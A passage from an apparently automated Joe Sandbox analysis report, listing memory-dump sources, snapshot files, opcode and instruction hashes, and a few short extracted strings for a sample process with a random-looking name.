                                                  • Instruction Fuzzy Hash: C6319F3160CE448FDB8AEF28C4A5EA4B7F1FB6931470442AED01FD7696CE24E845CB91
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 38c69d65a2d2ee7209326fe9f95581afef9604b9c1b9fd76fcc399dadd13d51b
                                                  • Instruction ID: dcf4aabf9798d5efe269d157b1462c89ae104cb0ba32557b13ee83703c721589
                                                  • Opcode Fuzzy Hash: 38c69d65a2d2ee7209326fe9f95581afef9604b9c1b9fd76fcc399dadd13d51b
                                                  • Instruction Fuzzy Hash: 71313C31A0CA498FDB99EF6CC495DB4B7E1FB6931070445AAE04FC7696CE24E885CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c4ff6914b566e21aeb02b76f14cf806ef192936df7d2a88682c84766ef07585
                                                  • Instruction ID: 0719b922ae3849380bce24f3f6ad8773d9ac927b261c640380d2498dd2363dd4
                                                  • Opcode Fuzzy Hash: 2c4ff6914b566e21aeb02b76f14cf806ef192936df7d2a88682c84766ef07585
                                                  • Instruction Fuzzy Hash: B3316F31618E49CFEB88EB28C455EB5B7E2FB6A31470441A9D04EC7196DE38E845CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b92826a4c10cc9f6f90c812056cd51bfcbd0dfcd521bd52d11470fbf9e9f4de5
                                                  • Instruction ID: d6f6ad848e5a01642c959bb227f34e31741559224a11e4167e0bfbee019cdc50
                                                  • Opcode Fuzzy Hash: b92826a4c10cc9f6f90c812056cd51bfcbd0dfcd521bd52d11470fbf9e9f4de5
                                                  • Instruction Fuzzy Hash: 3E314F3261C949CFDB98EF28C095EB477E1FB6A31471441A9D04FC7696DE38E885CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2afeea5f9a28e00fd02de66fc775b5d123143041fa54a36eb79d4816c135cf9
                                                  • Instruction ID: decb9808f5bc9d41e7e98209df4a1fe230ccb2936700a4bd2ee6cce4e79f2be9
                                                  • Opcode Fuzzy Hash: e2afeea5f9a28e00fd02de66fc775b5d123143041fa54a36eb79d4816c135cf9
                                                  • Instruction Fuzzy Hash: F7319C3160CD49CFDB89EB28C4A5AA5B7F1FB6931470442AED01FD3696CE24E845CB81
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67537462a96866e48073080c855983467c463c8395f06b673d9673a20ec7386b
                                                  • Instruction ID: 3372440402ee8fb6f146b5da9bfbe6cc1a4abc2f00bd65cf28ee0fda5b3b31ae
                                                  • Opcode Fuzzy Hash: 67537462a96866e48073080c855983467c463c8395f06b673d9673a20ec7386b
                                                  • Instruction Fuzzy Hash: B9317E3490D64DDFEBA6DB58C8516FD7BA0FB59300F10516AE00EE7290CA349918CB91
                                                  Memory Dump Source
                                                  • Instruction ID: 13d0bc8da495f2f20c22d104634882cb2a75addd87dd8cc5a787c0a8eae5f329
                                                  • Opcode Fuzzy Hash: 051745a432818cc2a6b8590759988461419bb098e5a5b650ba97a8928d06f5e6
                                                  • Instruction Fuzzy Hash: 1B11483224EA4A8BE75ACF1CE8547FA7B81DB92360F24127BD91EC31D1CA59E55883C1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49ac8f57f0f4ce3c48c6b852e913501156eb8b2ef9d52e4519cee5e979db84c1
                                                  • Instruction ID: f5b106d058bb548c50460be1719bb3fd24927620af4e32f40df5e060e4677586
                                                  • Opcode Fuzzy Hash: 49ac8f57f0f4ce3c48c6b852e913501156eb8b2ef9d52e4519cee5e979db84c1
                                                  • Instruction Fuzzy Hash: 5C01A16190AA4A9BF7B7D36544046BEABA1EF47350F14613BE00ED7181DD58AD0D82D1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 96de0ba284c67dc1e108aac5458a4209b2505fe50a6d98585fc0fb51b427c791
                                                  • Instruction ID: 01256be3d28024c6711266e5c5fda175799cf5304ff53507fec7464f08e7b2b0
                                                  • Opcode Fuzzy Hash: 96de0ba284c67dc1e108aac5458a4209b2505fe50a6d98585fc0fb51b427c791
                                                  • Instruction Fuzzy Hash: B4111E70608A088FDB99DF18D895A69B7E2FF9D301F5142AED04ED72A2CF74AC45CB40
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a79c0953dea8aed3ff15f22be90fc377a0ec18be629d6894dfca8d012801181
                                                  • Instruction ID: e8baed776239d8b5cc806cd366e5a5230b38ecfe6a9a11ca528d847c3776ff38
                                                  • Opcode Fuzzy Hash: 5a79c0953dea8aed3ff15f22be90fc377a0ec18be629d6894dfca8d012801181
                                                  • Instruction Fuzzy Hash: 2F01D631A0DA898FEB4AEBAC94516FD7BA0EF4A360F54507AD00ED31C3CD19984687C0
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53d05406560e31af4fbdd297a40ea5a1805dd82d2f4d2e20fb07d3896a14e789
                                                  • Instruction ID: 3f07f8bd02bef7e87d77a3911c5c12a82fa84cdafa00f27dea5eceae5ea40681
                                                  • Opcode Fuzzy Hash: 53d05406560e31af4fbdd297a40ea5a1805dd82d2f4d2e20fb07d3896a14e789
                                                  • Instruction Fuzzy Hash: 8011C43144E28ACFEB13DB64C8558D87BB0EF43314B1450E9D41DDB0A3DA39AA4BCBA1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bbebc02d18757793ffbd8391415125683e9d6b21edcdf35dfc7deb1decb69dab
                                                  • Instruction ID: 0c7a6e87a677f8c4135c172ccf82eaa2c793a9d9c6d7fdacd84cfcad6c43a2eb
                                                  • Opcode Fuzzy Hash: bbebc02d18757793ffbd8391415125683e9d6b21edcdf35dfc7deb1decb69dab
                                                  • Instruction Fuzzy Hash: 1A015731D3F193D2F639136AB4115BD64425F4AB20F24827BD60F821C1BC4CACACA3C2
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a2bfbfc8b5878979f76eef9259aefa8c8238ea2b4f79ab9694d54843601242a9
                                                  • Instruction ID: 2f8df17a17e0adc0f5f0acb34d5acf1c49bb9f92aa47ce80f4447415e884daef
                                                  • Opcode Fuzzy Hash: a2bfbfc8b5878979f76eef9259aefa8c8238ea2b4f79ab9694d54843601242a9
                                                  • Instruction Fuzzy Hash: 4F01CB72DFE993C6F3681368741317D2D026F82B18F648176D40F861C2BC4FE98822C2
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2499c7055bb7ed759dc498c7bcfbd9fa84870e3d50b81bdd0558aafe75f6f5d
                                                  • Instruction ID: 03a0c2ffd731e494b3b8c44cb3dfe515bf7dd13accec12cd3cee7546d021fe6d
                                                  • Opcode Fuzzy Hash: b2499c7055bb7ed759dc498c7bcfbd9fa84870e3d50b81bdd0558aafe75f6f5d
                                                  • Instruction Fuzzy Hash: 3911957092981EDFEB94DB98E4909BDB7B2FF59300B504079E10EE3291DA34A945CB54
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b001d48815c9b7b24e1e76c12a362a31decf8a61fe1ad47b62f816e28890617c
                                                  • Instruction ID: a181742378d5ccb7b3ccc3b4e9e5b949cc60219e7d76f14d74c923ade6c5921d
                                                  • Opcode Fuzzy Hash: b001d48815c9b7b24e1e76c12a362a31decf8a61fe1ad47b62f816e28890617c
                                                  • Instruction Fuzzy Hash: A8017530A09A08CFD799DB28C899A79B7E2FF5A300F1051AAD44ED76B1CE34AC45CB40
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b8242917ee743434dd5af27dcc793ef9bc5fbe945f9bff4ee000d2229ff28fa
                                                  • Instruction ID: b262104e7b8660b3671db45640e2f0f3c347a94c419e3837022d2775b363a0d2
                                                  • Opcode Fuzzy Hash: 1b8242917ee743434dd5af27dcc793ef9bc5fbe945f9bff4ee000d2229ff28fa
                                                  • Instruction Fuzzy Hash: 66017C3050840A8BDB89EF54D0C2DAAB361EFA531171082B5D40ECB35BC928FD95C7D0
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b914519ffc789c5964bb8897a5ac086fcefb96018ac4a0af8fdf5d77768a6d1
                                                  • Instruction ID: 787accc7ef90e0e5852f4696446bc439904589e722fe340c560f49e8e250bcfb
                                                  • Opcode Fuzzy Hash: 4b914519ffc789c5964bb8897a5ac086fcefb96018ac4a0af8fdf5d77768a6d1
                                                  • Instruction Fuzzy Hash: 9801A770A1DA888FEB8AEB6884916AC7BE1EF4B300F1554BDD55EC72C7CD18D846C781
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2048cee11e42e432b5ee07d5c89866691a818641dd1c3c8945ef21f00ed789fd
                                                  • Instruction ID: 2b047252c0496d9d04fda0a5e6103faf21b956cf4cd73ba4a0216da4fd7b5557
                                                  • Opcode Fuzzy Hash: 2048cee11e42e432b5ee07d5c89866691a818641dd1c3c8945ef21f00ed789fd
                                                  • Instruction Fuzzy Hash: B5018421D0E7868FFB13DB6888955FA7BA0EF17310B1861BAC04D8B1D3DA6CA4099780
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12178d4dc1ef3613d5a6c0bf3fbbae2750bfb7ac5c20a7f2b8aca0aceabd08d5
                                                  • Instruction ID: cd0a0911d1a9744e13fcd582f9df05a9e90486b2a8e55fbe82f8f47f1d9d4215
                                                  • Opcode Fuzzy Hash: 12178d4dc1ef3613d5a6c0bf3fbbae2750bfb7ac5c20a7f2b8aca0aceabd08d5
                                                  • Instruction Fuzzy Hash: D7F0C23285E3C6DFEB068B7098514F53FA5AF43204F0840FAD149870A2D52D960ECBE1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3524c7136d3be34c4ac29497743263e42b3fbef663052ae48cac1784b82d2884
                                                  • Instruction ID: b54fbb952f63eba125a492fae5b08a2dbce9d011f40765f6b1441ef8932386ec
                                                  • Opcode Fuzzy Hash: 3524c7136d3be34c4ac29497743263e42b3fbef663052ae48cac1784b82d2884
                                                  • Instruction Fuzzy Hash: 88F0363145E2C5EFE703DBB0C8115A67FB4AF43214F1950E7E449C70A2C96D565AC7A1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 78f6f1b439cbd31dd29752d96fb2194557f19f575e17bc7db0b1f56f49f3e680
                                                  • Instruction ID: 0e39c3cc781b34aa87f6ec03a060f305d24ac8c33708de64c8f1d4a883804445
                                                  • Opcode Fuzzy Hash: 78f6f1b439cbd31dd29752d96fb2194557f19f575e17bc7db0b1f56f49f3e680
                                                  • Instruction Fuzzy Hash: F3F0CD3185E2C5DFE7068B70D8554B93FA1AF03210F0880F6E48DCB0A2E96D970AC7A1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 781664a7341bc87895364c97ec80148dbbb1ce5058f6250d021d6877d5eaa165
                                                  • Instruction ID: 3d0ee811f9eaf89f3a150a106a6f9b9654f32d51327ba7e79ddaecdc2f5a6617
                                                  • Opcode Fuzzy Hash: 781664a7341bc87895364c97ec80148dbbb1ce5058f6250d021d6877d5eaa165
                                                  • Instruction Fuzzy Hash: 06F0A42190E3828FE7138B658C910A93FA0EF5731070861FBC4498B0D3DA68A91AD7D1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1dde8af2f8043c659d2b9ddd46c0fc62ec99e75775702029e4f7aaf3bd45a456
                                                  • Instruction ID: 52274b4c23895bf0c65f23a54b75dfb86fcdcdf26684258f2d96ba1c7c6b7ddb
                                                  • Opcode Fuzzy Hash: 1dde8af2f8043c659d2b9ddd46c0fc62ec99e75775702029e4f7aaf3bd45a456
                                                  • Instruction Fuzzy Hash: 3FE0393190964DCFEB56EF2884512A97BA1FF56300F049569E40C82185DA75DA68CBC1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c719b9b5f1cef3eab0f4326e91c3b8c5a3ab83dcbeb3567d5ca11ba30e24835
                                                  • Instruction ID: fca390271517f424ee459ad1803fd99122f3f1dba024d73478380303c1bb251f
                                                  • Opcode Fuzzy Hash: 6c719b9b5f1cef3eab0f4326e91c3b8c5a3ab83dcbeb3567d5ca11ba30e24835
                                                  • Instruction Fuzzy Hash: 50D0C960F1E243CBBB1B86A988540BDB2609F43344B94A134E11F5F3C6CD5CA84967D0
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e26bcc24fb1a896b6946a0d97841732cccd1314c2baa9518bebe6db8b0fac3d2
                                                  • Instruction ID: 02e68eb39ea634ae8424b5a94911c8f5b37a10a3c71c3776c8f0e149846cc3a7
                                                  • Opcode Fuzzy Hash: e26bcc24fb1a896b6946a0d97841732cccd1314c2baa9518bebe6db8b0fac3d2
                                                  • Instruction Fuzzy Hash: 55D09218A0E503D5F16B8B0982202BBB1A45F12701E24F83AD06F459C1CD18F4096281
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a5e1d483b634d4431efcaee70891d048c2b06872b56234492a8063f66121ced
                                                  • Instruction ID: f2854b48d34e02441268d0117f9d69b722d6da60a3ab818a9a40180cd5257980
                                                  • Opcode Fuzzy Hash: 1a5e1d483b634d4431efcaee70891d048c2b06872b56234492a8063f66121ced
                                                  • Instruction Fuzzy Hash: 1DD09214A0E557E5F22BCF21812063976949F43301E24F03AC15F518C18B1CF4196691
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                  • Instruction ID: 050bf80c59a22b66549e440f4527f06ff5b42f3e56de0a37a0696cfa65c36f50
                                                  • Opcode Fuzzy Hash: e0e84db1c0953825c6a11af4ca712878906a4be45a9a3713c164707f23aba6fe
                                                  • Instruction Fuzzy Hash: CCD09230A2F507C7F2785741602023A29979F42700F22C43AD09F619C1A91CFE496381
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 62cc7584e29cb24c4cfb3fddda804cc385c9a5f8f3c197e42f2a5b70daa887f9
                                                  • Instruction ID: 694dd72be14ede94a275b8ca8ea8b84fd3a3a108cae2e2b7610499ac2054f2e8
                                                  • Opcode Fuzzy Hash: 62cc7584e29cb24c4cfb3fddda804cc385c9a5f8f3c197e42f2a5b70daa887f9
                                                  • Instruction Fuzzy Hash: F8D09228A2FA07CAF629A705612023959B65F26700F20C53AC09F418D1A919FB4963A6
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97b5b4b87c2dba977795931ca0690acf225cd92460997749b6571d8fab43f2d0
                                                  • Instruction ID: c0da9a9ed4e79fe42db98b7d7c5ac65c70e50a55fd147bedc75f2e8aa9a4a172
                                                  • Opcode Fuzzy Hash: 97b5b4b87c2dba977795931ca0690acf225cd92460997749b6571d8fab43f2d0
                                                  • Instruction Fuzzy Hash: 01C04C7065E405CFF692DB19C584A2837A0EF45301F6560B4E00DDB1B5DA29EC059740
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                  • Instruction ID: 618166171c8e3c2ac21cc359a57f449b51c9e1e7d832eba3e861ccdec52c64bb
                                                  • Opcode Fuzzy Hash: 9a387468d7b75d82c239a31dcb19fed649040a8da0d84f97847f4e505b71c53a
                                                  • Instruction Fuzzy Hash: C3B09220E2E203C3B52066B4244007C00530B06280B20C631A20E892C2FC4EAE0863E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 2_^$2_^$2_^$2_^$<2_^$>2_^
                                                  • API String ID: 0-484592079
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 1_^$1_^$1_^$1_^
                                                  • API String ID: 0-2465893738
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8\$m8_H${z}$1_H
                                                  • API String ID: 0-1968118676